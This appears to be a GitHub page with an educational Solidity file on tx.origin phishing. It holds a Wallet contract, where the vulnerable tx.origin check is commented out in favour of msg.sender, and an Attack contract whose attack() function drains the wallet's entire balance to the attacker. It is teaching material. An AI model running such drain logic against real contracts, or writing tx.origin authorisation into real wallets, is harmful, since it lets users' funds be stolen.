-
Notifications
You must be signed in to change notification settings - Fork 0
/
Phising.sol
56 lines (45 loc) · 1.19 KB
/
Phising.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.10;
/*
Phising with tx.origin
- What is tx.origin?
- Contract using tx.origin
- Exploit tx.origin
- Demo
- Preventative technique
*/
/*
Alice. -> A -> B (msg.sender = A)
(tx.origin = Alice)
*/
contract Wallet {
address public owner;
constructor() public {
owner = msg.sender;
}
function deposit() public payable {}
/*
Alice -> Wallet.transfer() (tx.origin = Alice)
Alice -> Eve's malicious contract -> Wallet.transfer() (tx.origin = Alice)
*/
function transfer(address payable _to, uint _amount) public {
// require(tx.origin == owner, "Not owner");
require(msg.sender == owner, "Not owner");
(bool sent, ) = _to.call{value: _amount}("");
require(sent, "Failed to send Ether");
}
function getBalance() public view returns (uint) {
return address(this).balance;
}
}
contract Attack {
address payable public owner;
Wallet wallet;
constructor(Wallet _wallet) public {
wallet = Wallet(_wallet);
owner = msg.sender;
}
function attack() public {
wallet.transfer(owner, address(wallet).balance);
}
}